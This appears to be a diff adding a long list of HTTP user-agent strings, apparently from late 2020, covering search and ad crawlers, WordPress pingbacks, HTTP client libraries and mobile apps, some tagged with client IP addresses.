    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606064511-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606043608-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606056447-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606064492-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606064489-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606021860-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606021864-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606067383-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606067386-0
    +WordPress/4.9.15; http://www.boawsz.co
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.0.6.1040 (SpeedMode; Proxy; Android 4.4.2; HUAWEI_Y541-U02 ) U2/1.0.0 Mobile
    +okhttp/3.12.5 [ip:176.201.9.26]
    +okhttp/3.12.5 [ip:5.169.110.224]
    +okhttp/4.8.1 [ip:213.32.4.81]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.191.64]
    +AdsBot-Google (+http://www.google.com/adsbot.html) [ip:213.32.4.115]
    +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) [ip:66.249.73.88]
    +okhttp/3.12.5 [ip:151.57.166.117]
    +curl/7.36.0 [ip:87.15.44.16]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.202.139]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.208]
    +Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/) [ip:195.154.122.232]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.202.60]
    +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) [ip:207.46.13.105]
    +Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/) [ip:195.154.123.25]
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606139365-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606150164-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606150177-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606150166-10
    +WordPress/5.5.3; http://nastroikato.ru
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606143749-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606161208-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606161199-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606095446-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606137709-0
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.191.136]
    +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 PTST/201122.151115
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606115707-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606115711-0
    +WhatsApp/2.20.205.11 A
    +WhatsApp/2.20.206.18 A
    +facebookplatform/1.0 (+http://developers.facebook.com)+Sleipnir6/6.4.4; SleipnirSiteUpdates/6.4.4)
    +okhttp/3.11.0 [ip:93.32.142.12]
    +okhttp/3.12.5 [ip:176.201.31.174]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.202.168]
    +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.140 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) [ip:66.249.76.18]
    +Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html) [ip:213.32.4.115]
    +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.140 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) [ip:66.249.76.67]
    +okhttp/3.11.0 [ip:37.161.223.71]
    +okhttp/3.11.0 [ip:37.162.9.88]
    +AvsDeviceSdk/1.18.0
    +python-requests/2.18.4 [ip:54.158.161.97]
    +okhttp/3.11.0 [ip:151.37.184.152]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.127]
    +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.4 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.4 facebookexternalhit/1.1 Facebot Twitterbot/1.0 [ip:213.32.4.81]
    +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) [ip:157.55.39.242]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.138]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.202.165]
    +okhttp/3.11.0 [ip:185.62.48.184]
    +curl/7.19.5
    +WordPress/3.7.35; http://poisti.me; verifying pingback from 2.58.13.9
    +WordPress/4.9.6; http://www.songwah.xyz
    +WordPress/5.5.1; http://rohanparmar.co.uk
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606245792-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606192661-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606185228-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606192637-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606200411-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606200443-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606200396-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606200397-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606212657-0
    +Screaming Frog SEO Spider/14.0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606255313-0
    +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) mrs_image/1606230952-60
    +python-httpx/0.16.0
    +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve-gq1/1606241117-60
    +WordPress/5.3.6; https://usedcomputers.ru
    +AngleSharp/0.14.0.0
    +WordPress/5.5.3; https://digitalniarchitekti.cz
    +WordPress/5.5.3; https://nl-inloggen.net
    +WordPress.com; http://nl-inloggen.net
    +WordPress.com; https://nl-inloggen.net
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606247900-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606247901-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606247901-10
    +okhttp/3.12.5 [ip:176.201.7.243]
    +okhttp/3.11.0 [ip:93.57.248.89]
    +Googlebot-Video/1.0 [ip:213.32.4.224]
    +okhttp/3.11.0 [ip:95.74.96.88]
    +Debian APT-HTTP/1.3 (1.8.2.1)
    +AvsDeviceSdk/1.11.0 [ip:213.32.4.81]
    +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) [ip:207.46.13.3]
    +NaverMailApp/2.1.23 (Android 9; SM-G960N)
    +NaverMailApp/2.1.23 (Android 9; SM-N976N)
    +NaverMailApp/2.2.2 (Android 9; SM-N950F)
    +NaverMailApp/2.2.2 (Android 10; LM-G710N)
    +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36 [ip:66.249.76.110]
    +Googlebot-Video/1.0 [ip:213.32.4.81]
    +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Mediapartners-Google) Chrome/85.0.4183.140 Mobile Safari/537.36 [ip:66.249.92.66]
    +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Mediapartners-Google) Chrome/85.0.4183.140 Mobile Safari/537.36 [ip:66.249.92.95]
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606287619-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606298690-0
    +WordPress/5.5.3; https://joshuatz.com
    +Apache-HttpClient/4.5 (Java/1.8.0_262)
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606342045-0
    +python-requests/2.3.0 CPython/2.7.18 Windows/10
    +GuzzleHttp/6.3.3 curl/7.47.0 PHP/7.0.33-0ubuntu0.16.04.16
    +WordPress/5.5.3; http://pronastroiku.ru
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606333523-10
    +WhatsApp/2.20.206.16 A
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606342098-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606342110-10
    +Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:82.0) adbeat.com/policy Gecko/20100101 Firefox/82.0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1606265563-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606291707-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606291718-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606291731-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606316561-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606316562-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606330013-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606330007-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606339398-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606339397-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606339399-0
    +WordPress/5.5.3; https://puppy.arin.store
    +Iframely/1.4.4 (+http://localhost:8061)
    +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) [ip:66.249.76.8]
    +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) [ip:66.249.76.5]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.191.242]
    +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) [ip:207.46.13.86]
    +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) [ip:157.55.39.59]
    +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Mediapartners-Google) Chrome/85.0.4183.140 Mobile Safari/537.36 [ip:66.249.92.64]
    +okhttp/3.12.5 [ip:151.47.163.22]
    +okhttp/3.12.5 [ip:37.161.24.223]
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606354004-0
    +yacybot (/global; amd64 Linux 5.3.0-64-generic; java 1.8.0_252; Etc/en) http://yacy.net/bot.html
    +Bot 1.0
    +WordPress/5.1.8; http://highscreen-support.ru
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606394303-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606394318-0
    +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 PTST/201125.171127
    +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Mobile Safari/537.36 PTST/190509.230546 PTST/201125.171127
    +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) mrs_image/1606403105-60
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606496857-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606450799-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606450796-0
    +Y/Nutch-1.17
    +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1606514275-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606438170-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606438171-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606458026-0
    +WordPress/5.5.3; https://mawdo33.com
    +WordPress/4.5.23; http://opal6.shinraebc.com
    +WordPress/5.5.3; https://fpmp39.ru
    +FDM/6.12.1.3374
    +WordPress/5.5.1; https://shannoncrabill.com/blog
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606586599-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606586600-10
    +HTMLParser/2.0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1606526219-0
    +yacybot (/global; amd64 Linux 5.9.0-3-amd64; java 15.0.1; Europe/es) http://yacy.net/bot.html
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606555190-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606561845-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606561830-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606596479-0
    +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve-gq1/1606556805-60
    +Python/3.7 aiohttp/3.7.3
    +Mozilla/5.0 (compatible; SemrushBot-SWA/0.1; +http://www.semrush.com/bot.html)
    +Snapchat/10.78.1.0 (RMX2030; Android 10#1602498266#29; gzip) V/MUSHROOM
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.3.1128 (SpeedMode; Proxy; Android 8.1.0; SM-J330G ) U2/1.0.0 Mobile
    +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 AppEngine-Google; (+http://code.google.com/appengine; appid: e~zefanqiang5)
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606676901-10
    +Apache-HttpClient/4.5.3 (Java/1.8.0_152)
    +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/609.1 (KHTML, like Gecko) JavaFX/8.0 Safari/609.1
    +WhatsApp/2.20.202.15 A
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.7.8.806 (SpeedMode; Proxy; Android 9; Redmi_Note_8 ) U2/1.0.0 Mobile
    +WhatsApp/2.20.201.24 A
    +WhatsApp/2.20.200.17 A
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606682964-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606613183-0
    +WordPress/5.5.3; https://rdpmate.com
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606664826-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606664824-0
    +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve-gq1/1606639855-60
    +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve-gq1/1606640153-60
    +WordPress/5.5.3; https://expertnov.ru
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606686514-0
    +facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php) Trident/7.0; Sleipnir6/6.4.4; SleipnirSiteUpdates/6.4.4)
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606686512-0
    +AvsDeviceSdk/1.12.0
    +WordPress/5.5.3; https://simpleprogrammer.com
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606709527-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1606699346-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606709518-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606709516-0
    +python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.35.1.el6.x86_64
    +WordPress/5.2.9; https://sam-sebe.su
    +WordPress/4.9.16; http://www.wdqxg.co
    +Java-http-client/15.0.1
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.7.6.805 (SpeedMode; Proxy; Android 10; Redmi_Note_7 ) U2/1.0.0 Mobile
    +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 PTST/201130.161108
    +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Mobile Safari/537.36 PTST/201130.161108
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606828813-0
    +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 PTST/391
    +WordPress/5.5.3; https://www.idnpos.com
    +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606834393-10
    +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Mobile Safari/537.36 PTST/201201.211227
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606865630-10
    +Tiny Tiny RSS/20.09-de22464ea (http://tt-rss.org/)
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1606784194-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606785575-0
